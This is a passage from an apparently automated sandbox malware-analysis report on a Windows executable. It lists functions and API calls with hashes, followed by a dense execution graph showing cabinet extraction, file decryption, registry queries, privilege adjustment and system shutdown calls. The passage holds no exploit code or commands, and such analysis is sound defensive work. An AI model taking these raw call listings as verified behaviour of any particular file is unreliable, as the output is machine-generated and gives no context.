                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcmp
                                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET$J,Q
                                                                                                                                                                                                                                                            • API String ID: 1534048567-2397291215
                                                                                                                                                                                                                                                            • Opcode ID: df5cf393bf4837fff8e84ea819c8c1566b45e2c98cb3996ff1868ec3bd9ef217
                                                                                                                                                                                                                                                            • Instruction ID: ec7b005f2103bd2c0757d477e659959dc61488a8092eca940bfccc5f090f5ad5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df5cf393bf4837fff8e84ea819c8c1566b45e2c98cb3996ff1868ec3bd9ef217
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F119331A41D354EC3248F19FC486593A97EF91768B145659E4299F3E1CF718847CF84
                                                                                                                                                                                                                                                            Function 00623680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0062369F
                                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 006236B2
                                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 006236CB
                                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 006236DA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                                            • Opcode ID: 5c22ac25052fb3d4e11c06bd05c8ade350f0b9beeddfeeb6bc9f52d5db88d5d4
                                                                                                                                                                                                                                                            • Instruction ID: 3af25a514a9c2b8483d119dbe89013d5b0e2f7f6eec330ddb8e6ce68731ee78f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c22ac25052fb3d4e11c06bd05c8ade350f0b9beeddfeeb6bc9f52d5db88d5d4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C601847290063477DB304BE66C4CEEB767EEB85B20F100129B905E2380D6A48652CA61
                                                                                                                                                                                                                                                            Function 006265E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,?,00000000,00622B33), ref: 00626602
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00626612
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00626629
                                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00626635
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                                            • Opcode ID: 25e50d6fefa75850eac5a351daf99c8617ae3dd7db18a8834c91846efd325633
                                                                                                                                                                                                                                                            • Instruction ID: a952ee1873ff7df4707302aa21a40a32964f005f645e1bdd05a55ed777a2e30d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25e50d6fefa75850eac5a351daf99c8617ae3dd7db18a8834c91846efd325633
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3F0F931004D606FD7321B68EC8C8F7AF9EDB8B264F1901AFF49192601D6550D078F62
                                                                                                                                                                                                                                                            Function 00626952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`Wb,?,00000000,00625760,?,A:\), ref: 0062697F
                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00626999
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                            • String ID: `Wb
                                                                                                                                                                                                                                                            • API String ID: 1705453755-3788560853
                                                                                                                                                                                                                                                            • Opcode ID: 2deb1c2c82baaa2bbf7e47c799c07d599313b6e7c22e7b256227cf2f4483e1f4
                                                                                                                                                                                                                                                            • Instruction ID: 22d7167386d897e2fc12493442f90f1fe2e4f7372c5c878e4584dcd619b9db37
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2deb1c2c82baaa2bbf7e47c799c07d599313b6e7c22e7b256227cf2f4483e1f4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91F0F9B6D0022CBBCB11DFE8DC44ADEBBBDEB48710F104196F510E3240DA719A518BD1

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:28%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                                            Total number of Nodes:970
                                                                                                                                                                                                                                                            Total number of Limit Nodes:44
                                                                                                                                                                                                                                                            execution_graph 3126 3e7270 _except_handler4_common 3127 3e69b0 3128 3e69b5 3127->3128 3136 3e6fbe GetModuleHandleW 3128->3136 3130 3e69c1 __set_app_type __p__fmode __p__commode 3131 3e69f9 3130->3131 3132 3e6a0e 3131->3132 3133 3e6a02 __setusermatherr 3131->3133 3138 3e71ef _controlfp 3132->3138 3133->3132 3135 3e6a13 3137 3e6fcf 3136->3137 3137->3130 3138->3135 3139 3e34f0 3140 3e3504 3139->3140 3141 3e35b8 3139->3141 3140->3141 3143 3e35be GetDesktopWindow 3140->3143 3144 3e351b 3140->3144 3142 3e3526 3141->3142 3145 3e3671 EndDialog 3141->3145 3161 3e43d0 6 API calls 3143->3161 3147 3e354f 3144->3147 3148 3e351f 3144->3148 3145->3142 3147->3142 3151 3e3559 ResetEvent 3147->3151 3148->3142 3150 3e352d TerminateThread EndDialog 3148->3150 3150->3142 3152 3e44b9 20 API calls 3151->3152 3155 3e3581 3152->3155 3153 3e361d SetWindowTextA CreateThread 3153->3142 3156 3e3646 3153->3156 3154 3e35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3154->3153 3157 3e359b SetEvent 3155->3157 3159 3e358a SetEvent 3155->3159 3158 3e44b9 20 API calls 3156->3158 3160 3e3680 4 API calls 3157->3160 3158->3141 3159->3142 3160->3141 3162 3e4463 SetWindowPos 3161->3162 3164 3e6ce0 4 API calls 3162->3164 3165 3e35d6 3164->3165 3165->3153 3165->3154 3166 3e6ef0 3167 3e6f2d 3166->3167 3169 3e6f02 3166->3169 3168 3e6f27 ?terminate@ 3168->3167 3169->3167 3169->3168 3170 3e6bef _XcptFilter 2196 3e4ca0 GlobalAlloc 2197 3e6a60 2214 3e7155 2197->2214 2199 3e6a65 2200 3e6a76 GetStartupInfoW 2199->2200 2201 3e6a93 2200->2201 2202 3e6aa8 2201->2202 2203 3e6aaf Sleep 2201->2203 2204 3e6ac7 _amsg_exit 2202->2204 2206 3e6ad1 2202->2206 2203->2201 2204->2206 2205 3e6b13 _initterm 2212 3e6b2e __IsNonwritableInCurrentImage 2205->2212 2206->2205 2208 3e6af4 2206->2208 2206->2212 2207 3e6bd6 _ismbblead 2207->2212 2209 3e6c1e 2209->2208 2211 3e6c27 _cexit 2209->2211 2211->2208 2212->2207 2212->2209 2213 3e6bbe exit 2212->2213 2219 3e2bfb GetVersion 2212->2219 2213->2212 2215 3e717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2215 2216 3e717a 2214->2216 2218 3e71cd 2215->2218 2216->2215 2217 3e71e2 2216->2217 2217->2199 2218->2217 2220 3e2c0f 2219->2220 2221 3e2c50 2219->2221 2220->2221 2222 3e2c13 GetModuleHandleW 2220->2222 2236 3e2caa memset memset memset 2221->2236 2222->2221 2225 3e2c22 GetProcAddress 2222->2225 2225->2221 2233 3e2c34 2225->2233 2226 3e2c8e 2228 3e2c9e 2226->2228 2229 3e2c97 CloseHandle 2226->2229 2228->2212 2229->2228 2233->2221 2234 3e2c89 2329 3e1f90 2234->2329 2346 3e468f FindResourceA SizeofResource 2236->2346 2239 3e2e30 2242 3e44b9 20 API calls 2239->2242 2240 3e2d2d CreateEventA SetEvent 2241 3e468f 7 API calls 2240->2241 2243 3e2d57 2241->2243 2244 3e2e4d 2242->2244 2245 3e2d5b 2243->2245 2247 3e2e1f 2243->2247 2248 3e2d8a 2243->2248 2378 3e6ce0 2244->2378 2383 3e44b9 2245->2383 2351 3e5c9e 2247->2351 2251 3e468f 7 API calls 2248->2251 2254 3e2d9f 2251->2254 2252 3e2c62 2252->2226 2278 3e2f1d 2252->2278 2254->2245 2256 3e2da3 CreateMutexA 2254->2256 2255 3e2e3a 2257 3e2e52 FindResourceA 2255->2257 2258 3e2e43 2255->2258 2256->2247 2259 3e2dbd GetLastError 2256->2259 2261 3e2e6e 2257->2261 2262 3e2e64 LoadResource 2257->2262 2412 3e2390 2258->2412 2259->2247 2260 3e2dca 2259->2260 2264 3e2dea 2260->2264 2265 3e2dd5 2260->2265 2261->2244 2268 3e2e8b 2261->2268 2262->2261 2267 3e44b9 20 API calls 2264->2267 2266 3e44b9 20 API calls 2265->2266 2269 3e2de8 2266->2269 2270 3e2dff 2267->2270 2427 3e36ee GetVersionExA 2268->2427 2272 3e2e04 CloseHandle 2269->2272 2270->2247 2270->2272 2272->2244 2277 3e2d6e 2277->2244 2279 3e2f3f 2278->2279 2283 3e2f64 2278->2283 2286 3e2f4d 2279->2286 2551 3e51e5 2279->2551 2285 3e3041 2283->2285 2590 3e5164 2283->2590 2284 3e2f71 2284->2285 2605 3e55a0 2284->2605 2288 3e6ce0 4 API calls 2285->2288 2286->2283 2286->2285 2571 3e3a3f 2286->2571 2290 3e2c6b 2288->2290 2316 3e52b6 2290->2316 2291 3e2f86 GetSystemDirectoryA 2292 3e658a CharPrevA 2291->2292 2293 3e2fab LoadLibraryA 2292->2293 2294 3e2ff7 FreeLibrary 2293->2294 2295 3e2fc0 GetProcAddress 2293->2295 2297 3e3006 2294->2297 2298 3e3017 SetCurrentDirectoryA 2294->2298 2295->2294 2296 3e2fd6 DecryptFileA 2295->2296 2296->2294 2305 3e2ff0 2296->2305 2297->2298 2655 3e621e GetWindowsDirectoryA 2297->2655 2299 3e3026 2298->2299 2300 3e3054 2298->2300 2304 3e44b9 20 API calls 2299->2304 2302 3e3061 2300->2302 2666 3e3b26 2300->2666 2302->2285 2307 3e307a 2302->2307 2675 3e256d 2302->2675 2309 3e3037 2304->2309 2305->2294 2311 3e3098 2307->2311 2686 3e3ba2 2307->2686 2736 3e6285 GetLastError 2309->2736 2311->2285 2723 3e4169 2311->2723 2317 3e52d6 2316->2317 2322 3e5316 2316->2322 2319 3e5300 LocalFree LocalFree 2317->2319 2321 3e52eb SetFileAttributesA DeleteFileA 2317->2321 2318 3e538c 2320 3e6ce0 4 API calls 2318->2320 2319->2317 2319->2322 2323 3e2c72 2320->2323 2321->2319 2325 3e535e SetCurrentDirectoryA 2322->2325 2326 3e65e8 4 API calls 2322->2326 2328 3e5374 2322->2328 2323->2226 2323->2234 2327 3e2390 13 API calls 2325->2327 2326->2325 2327->2328 2328->2318 3058 3e1fe1 2328->3058 2330 3e1f9a 2329->2330 2331 3e1f9f 2329->2331 2332 3e1ea7 15 API calls 2330->2332 2333 3e1fc0 2331->2333 2336 3e44b9 20 API calls 2331->2336 2337 3e1fd9 2331->2337 2332->2331 2334 3e1fcf ExitWindowsEx 2333->2334 2335 3e1ee2 GetCurrentProcess OpenProcessToken 2333->2335 2333->2337 2334->2337 2339 3e1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2335->2339 2341 3e1f0e 2335->2341 2336->2333 2337->2226 2340 3e1f6b ExitWindowsEx 2339->2340 2339->2341 2340->2341 2342 3e1f1f 2340->2342 2343 3e44b9 20 API calls 2341->2343 2344 3e6ce0 4 API calls 2342->2344 2343->2342 2345 3e1f8c 2344->2345 2345->2226 2347 3e46b6 2346->2347 2349 3e2d1a 2346->2349 2348 3e46be FindResourceA LoadResource LockResource 2347->2348 2347->2349 2348->2349 2350 3e46df memcpy_s FreeResource 2348->2350 2349->2239 2349->2240 2350->2349 2352 3e60fb 2351->2352 2360 3e5cc3 2351->2360 2353 3e6ce0 4 API calls 2352->2353 2354 3e2e2c 2353->2354 2354->2239 2354->2255 2355 3e5ced CharNextA 2355->2360 2356 3e5dec GetModuleFileNameA 2357 3e5e17 2356->2357 2358 3e5e0a 2356->2358 2357->2352 2469 3e66c8 2358->2469 2360->2352 2360->2355 2361 3e6218 2360->2361 2364 3e5e36 CharUpperA 2360->2364 2370 3e5dd0 2360->2370 2371 3e5f9f CharUpperA 2360->2371 2372 3e5f59 CompareStringA 2360->2372 2373 3e6003 CharUpperA 2360->2373 2374 3e5edc CharUpperA 2360->2374 2375 3e60a2 CharUpperA 2360->2375 2377 3e667f IsDBCSLeadByte CharNextA 2360->2377 2474 3e658a 2360->2474 2478 3e6e2a 2361->2478 2364->2360 2365 3e61d0 2364->2365 2366 3e44b9 20 API calls 2365->2366 2367 3e61e7 2366->2367 2368 3e61f7 ExitProcess 2367->2368 2369 3e61f0 CloseHandle 2367->2369 2369->2368 2370->2352 2370->2356 2371->2360 2372->2360 2373->2360 2374->2360 2375->2360 2377->2360 2379 3e6ce8 2378->2379 2380 3e6ceb 2378->2380 2379->2252 2485 3e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2380->2485 2382 3e6e26 2382->2252 2384 3e44fe LoadStringA 2383->2384 2385 3e455a 2383->2385 2386 3e4527 2384->2386 2387 3e4562 2384->2387 2389 3e6ce0 4 API calls 2385->2389 2486 3e681f 2386->2486 2393 3e45c9 2387->2393 2399 3e457e 2387->2399 2391 3e4689 2389->2391 2391->2277 2392 3e4536 MessageBoxA 2392->2385 2395 3e45cd LocalAlloc 2393->2395 2396 3e4607 LocalAlloc 2393->2396 2395->2385 2400 3e45f3 2395->2400 2396->2385 2407 3e45c4 2396->2407 2399->2399 2402 3e4596 LocalAlloc 2399->2402 2404 3e171e _vsnprintf 2400->2404 2401 3e462d MessageBeep 2405 3e681f 10 API calls 2401->2405 2402->2385 2403 3e45af 2402->2403 2503 3e171e 2403->2503 2404->2407 2408 3e463b 2405->2408 2407->2401 2409 3e4645 MessageBoxA LocalFree 2408->2409 2410 3e67c9 EnumResourceLanguagesA 2408->2410 2409->2385 2410->2409 2413 3e24cb 2412->2413 2416 3e23b9 2412->2416 2414 3e6ce0 4 API calls 2413->2414 2415 3e24dc 2414->2415 2415->2244 2416->2413 2417 3e23e9 FindFirstFileA 2416->2417 2417->2413 2418 3e2407 2417->2418 2419 3e2479 2418->2419 2420 3e2421 lstrcmpA 2418->2420 2421 3e24a9 FindNextFileA 2418->2421 2425 3e658a CharPrevA 2418->2425 2426 3e2390 5 API calls 2418->2426 2423 3e2488 SetFileAttributesA DeleteFileA 2419->2423 2420->2421 2422 3e2431 lstrcmpA 2420->2422 2421->2418 2424 3e24bd FindClose RemoveDirectoryA 2421->2424 2422->2418 2422->2421 2423->2421 2424->2413 2425->2418 2426->2418 2432 3e3737 2427->2432 2434 3e372d 2427->2434 2428 3e44b9 20 API calls 2429 3e39fc 2428->2429 2430 3e6ce0 4 API calls 2429->2430 2431 3e2e92 2430->2431 2431->2244 2431->2277 2442 3e18a3 2431->2442 2432->2429 2432->2434 2435 3e38a4 2432->2435 2513 3e28e8 2432->2513 2434->2428 2434->2429 2435->2429 2435->2434 2436 3e39c1 MessageBeep 2435->2436 2437 3e681f 10 API calls 2436->2437 2438 3e39ce 2437->2438 2439 3e39d8 MessageBoxA 2438->2439 2441 3e67c9 EnumResourceLanguagesA 2438->2441 2439->2429 2441->2439 2443 3e18d5 2442->2443 2448 3e19b8 2442->2448 2542 3e17ee LoadLibraryA 2443->2542 2445 3e6ce0 4 API calls 2447 3e19d5 2445->2447 2447->2277 2462 3e6517 FindResourceA 2447->2462 2448->2445 2449 3e18e5 GetCurrentProcess OpenProcessToken 2449->2448 2450 3e1900 GetTokenInformation 2449->2450 2451 3e19aa CloseHandle 2450->2451 2452 3e1918 GetLastError 2450->2452 2451->2448 2452->2451 2453 3e1927 LocalAlloc 2452->2453 2454 3e1938 GetTokenInformation 2453->2454 2455 3e19a9 2453->2455 2456 3e194e AllocateAndInitializeSid 2454->2456 2457 3e19a2 LocalFree 2454->2457 2455->2451 2456->2457 2459 3e196e 2456->2459 2457->2455 2458 3e1999 FreeSid 2458->2457 2459->2458 2460 3e1975 EqualSid 2459->2460 2461 3e198c 2459->2461 2460->2459 2460->2461 2461->2458 2463 3e656b 2462->2463 2464 3e6536 LoadResource 2462->2464 2466 3e44b9 20 API calls 2463->2466 2464->2463 2465 3e6544 DialogBoxIndirectParamA FreeResource 2464->2465 2465->2463 2467 3e657c 2465->2467 2466->2467 2467->2277 2470 3e66d5 2469->2470 2471 3e66f3 2470->2471 2473 3e66e5 CharNextA 2470->2473 2481 3e6648 2470->2481 2471->2357 2473->2470 2475 3e659b 2474->2475 2475->2475 2476 3e65b8 CharPrevA 2475->2476 2477 3e65ab 2475->2477 2476->2477 2477->2360 2484 3e6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2478->2484 2480 3e621d 2482 3e665d IsDBCSLeadByte 2481->2482 2483 3e6668 2481->2483 2482->2483 2483->2470 2484->2480 2485->2382 2487 3e6857 GetVersionExA 2486->2487 2496 3e691a 2486->2496 2489 3e687c 2487->2489 2487->2496 2488 3e6ce0 4 API calls 2490 3e452c 2488->2490 2491 3e68a5 GetSystemMetrics 2489->2491 2489->2496 2490->2392 2497 3e67c9 2490->2497 2492 3e68b5 RegOpenKeyExA 2491->2492 2491->2496 2493 3e68d6 RegQueryValueExA RegCloseKey 2492->2493 2492->2496 2494 3e690c 2493->2494 2493->2496 2507 3e66f9 2494->2507 2496->2488 2498 3e6803 2497->2498 2499 3e67e2 2497->2499 2498->2392 2511 3e6793 EnumResourceLanguagesA 2499->2511 2501 3e67f5 2501->2498 2512 3e6793 EnumResourceLanguagesA 2501->2512 2504 3e172d 2503->2504 2505 3e173d _vsnprintf 2504->2505 2506 3e175d 2504->2506 2505->2506 2506->2407 2508 3e670f 2507->2508 2509 3e6740 CharNextA 2508->2509 2510 3e674b 2508->2510 2509->2508 2510->2496 2511->2501 2512->2498 2514 3e2a62 2513->2514 2521 3e290d 2513->2521 2515 3e2a6e GlobalFree 2514->2515 2516 3e2a75 2514->2516 2515->2516 2516->2435 2518 3e2955 GlobalAlloc 2518->2514 2519 3e2968 GlobalLock 2518->2519 2519->2514 2519->2521 2520 3e2a20 GlobalUnlock 2520->2521 2521->2514 2521->2518 2521->2520 2522 3e2a80 GlobalUnlock 2521->2522 2523 3e2773 2521->2523 2522->2514 2524 3e28b2 2523->2524 2525 3e27a3 CharUpperA CharNextA CharNextA 2523->2525 2527 3e28b7 GetSystemDirectoryA 2524->2527 2526 3e27db 2525->2526 2525->2527 2528 3e28a8 GetWindowsDirectoryA 2526->2528 2529 3e27e3 2526->2529 2530 3e28bf 2527->2530 2528->2530 2535 3e658a CharPrevA 2529->2535 2531 3e28d2 2530->2531 2533 3e658a CharPrevA 2530->2533 2532 3e6ce0 4 API calls 2531->2532 2534 3e28e2 2532->2534 2533->2531 2534->2521 2536 3e2810 RegOpenKeyExA 2535->2536 2536->2530 2537 3e2837 RegQueryValueExA 2536->2537 2538 3e285c 2537->2538 2539 3e289a RegCloseKey 2537->2539 2540 3e2867 ExpandEnvironmentStringsA 2538->2540 2541 3e287a 2538->2541 2539->2530 2540->2541 2541->2539 2543 3e1826 GetProcAddress 2542->2543 2544 3e1890 2542->2544 2545 3e1889 FreeLibrary 2543->2545 2546 3e1839 AllocateAndInitializeSid 2543->2546 2547 3e6ce0 4 API calls 2544->2547 2545->2544 2546->2545 2549 3e185f FreeSid 2546->2549 2548 3e189f 2547->2548 2548->2448 2548->2449 2549->2545 2552 3e468f 7 API calls 2551->2552 2553 3e51f9 LocalAlloc 2552->2553 2554 3e522d 2553->2554 2555 3e520d 2553->2555 2557 3e468f 7 API calls 2554->2557 2556 3e44b9 20 API calls 2555->2556 2558 3e521e 2556->2558 2559 3e523a 2557->2559 2560 3e6285 GetLastError 2558->2560 2561 3e523e 2559->2561 2562 3e5262 lstrcmpA 2559->2562 2570 3e5223 2560->2570 2563 3e44b9 20 API calls 2561->2563 2564 3e527e 2562->2564 2565 3e5272 LocalFree 2562->2565 2567 3e524f LocalFree 2563->2567 2566 3e44b9 20 API calls 2564->2566 2568 3e5279 2565->2568 2569 3e5290 LocalFree 2566->2569 2567->2568 2568->2286 2569->2570 2570->2568 2572 3e468f 7 API calls 2571->2572 2573 3e3a55 LocalAlloc 2572->2573 2574 3e3a8e 2573->2574 2575 3e3a6c 2573->2575 2577 3e468f 7 API calls 2574->2577 2576 3e44b9 20 API calls 2575->2576 2578 3e3a7d 2576->2578 2579 3e3a98 2577->2579 2580 3e6285 GetLastError 2578->2580 2581 3e3a9c 2579->2581 2582 3e3ac5 lstrcmpA 2579->2582 2583 3e3a82 2580->2583 2584 3e44b9 20 API calls 2581->2584 2585 3e3b0d LocalFree 2582->2585 2586 3e3ada 2582->2586 2583->2283 2588 3e3aad LocalFree 2584->2588 2585->2583 2587 3e6517 24 API calls 2586->2587 2589 3e3aec LocalFree 2587->2589 2588->2583 2589->2583 2591 3e468f 7 API calls 2590->2591 2592 3e5175 2591->2592 2593 3e517a 2592->2593 2594 3e51af 2592->2594 2595 3e44b9 20 API calls 2593->2595 2596 3e468f 7 API calls 2594->2596 2597 3e518d 2595->2597 2598 3e51c0 2596->2598 2597->2284 2738 3e6298 2598->2738 2602 3e51ce 2604 3e44b9 20 API calls 2602->2604 2603 3e51e1 2603->2284 2604->2597 2606 3e468f 7 API calls 2605->2606 2607 3e55c7 LocalAlloc 2606->2607 2608 3e55fd 2607->2608 2609 3e55db 2607->2609 2610 3e468f 7 API calls 2608->2610 2611 3e44b9 20 API calls 2609->2611 2613 3e560a 2610->2613 2612 3e55ec 2611->2612 2614 3e6285 GetLastError 2612->2614 2615 3e560e 2613->2615 2616 3e5632 lstrcmpA 2613->2616 2639 3e55f1 2614->2639 2617 3e44b9 20 API calls 2615->2617 2618 3e564b LocalFree 2616->2618 2619 3e5645 2616->2619 2621 3e561f LocalFree 2617->2621 2622 3e565b 2618->2622 2623 3e5696 2618->2623 2619->2618 2620 3e55f6 2626 3e6ce0 4 API calls 2620->2626 2621->2620 2628 3e5467 49 API calls 2622->2628 2624 3e589f 2623->2624 2627 3e56ae GetTempPathA 2623->2627 2625 3e6517 24 API calls 2624->2625 2625->2620 2629 3e2f7e 2626->2629 2630 3e56c3 2627->2630 2634 3e56eb 2627->2634 2631 3e5678 2628->2631 2629->2285 2629->2291 2750 3e5467 2630->2750 2631->2620 2633 3e5680 2631->2633 2635 3e44b9 20 API calls 2633->2635 2634->2620 2636 3e586c GetWindowsDirectoryA 2634->2636 2637 3e5717 GetDriveTypeA 2634->2637 2635->2639 2784 3e597d GetCurrentDirectoryA SetCurrentDirectoryA 2636->2784 2640 3e5730 GetFileAttributesA 2637->2640 2653 3e572b 2637->2653 2639->2620 2640->2653 2644 3e5467 49 API calls 2644->2634 2645 3e2630 21 API calls 2645->2653 2647 3e57c1 GetWindowsDirectoryA 2647->2653 2648 3e597d 34 API calls 2648->2653 2649 3e658a CharPrevA 2650 3e57e8 GetFileAttributesA 2649->2650 2651 3e57fa CreateDirectoryA 2650->2651 2650->2653 2651->2653 2652 3e5827 SetFileAttributesA 2652->2653 2653->2620 2653->2636 2653->2637 2653->2640 2653->2645 2653->2647 2653->2648 2653->2649 2653->2652 2654 3e5467 49 API calls 2653->2654 2780 3e6952 2653->2780 2654->2653 2656 3e6268 2655->2656 2657 3e6249 2655->2657 2659 3e597d 34 API calls 2656->2659 2658 3e44b9 20 API calls 2657->2658 2660 3e625a 2658->2660 2661 3e6277 2659->2661 2662 3e6285 GetLastError 2660->2662 2663 3e6ce0 4 API calls 2661->2663 2664 3e625f 2662->2664 2665 3e3013 2663->2665 2664->2661 2665->2285 2665->2298 2667 3e3b2d 2666->2667 2667->2667 2668 3e3b72 2667->2668 2669 3e3b53 2667->2669 2851 3e4fe0 2668->2851 2671 3e6517 24 API calls 2669->2671 2672 3e3b70 2671->2672 2673 3e3b7b 2672->2673 2674 3e6298 10 API calls 2672->2674 2673->2302 2674->2673 2676 3e2622 2675->2676 2677 3e2583 2675->2677 2905 3e24e0 GetWindowsDirectoryA 2676->2905 2678 3e258b 2677->2678 2679 3e25e8 RegOpenKeyExA 2677->2679 2682 3e25e3 2678->2682 2683 3e259b RegOpenKeyExA 2678->2683 2681 3e2609 RegQueryInfoKeyA 2679->2681 2679->2682 2684 3e25d1 RegCloseKey 2681->2684 2682->2307 2683->2682 2685 3e25bc RegQueryValueExA 2683->2685 2684->2682 2685->2684 2687 3e3bdb 2686->2687 2695 3e3bec 2686->2695 2688 3e468f 7 API calls 2687->2688 2688->2695 2689 3e3c03 memset 2689->2695 2690 3e3d13 2691 3e44b9 20 API calls 2690->2691 2719 3e3d26 2691->2719 2693 3e3f4d 2696 3e6ce0 4 API calls 2693->2696 2694 3e468f 7 API calls 2694->2695 2695->2689 2695->2690 2695->2693 2695->2694 2697 3e3d7b CompareStringA 2695->2697 2699 3e3fd7 2695->2699 2701 3e3fab 2695->2701 2704 3e3f1e LocalFree 2695->2704 2705 3e3f46 LocalFree 2695->2705 2709 3e3cc7 CompareStringA 2695->2709 2720 3e3e10 2695->2720 2913 3e1ae8 2695->2913 2953 3e202a memset memset RegCreateKeyExA 2695->2953 2979 3e3fef 2695->2979 2698 3e3f60 2696->2698 2697->2695 2697->2699 2698->2311 2699->2693 3003 3e2267 2699->3003 2703 3e44b9 20 API calls 2701->2703 2707 3e3fbe LocalFree 2703->2707 2704->2695 2704->2699 2705->2693 2707->2693 2709->2695 2710 3e3e1f GetProcAddress 2712 3e3f64 2710->2712 2710->2720 2711 3e3f92 2713 3e44b9 20 API calls 2711->2713 2714 3e44b9 20 API calls 2712->2714 2715 3e3fa9 2713->2715 2716 3e3f75 FreeLibrary 2714->2716 2717 3e3f7c LocalFree 2715->2717 2716->2717 2718 3e6285 GetLastError 2717->2718 2718->2719 2719->2693 2720->2710 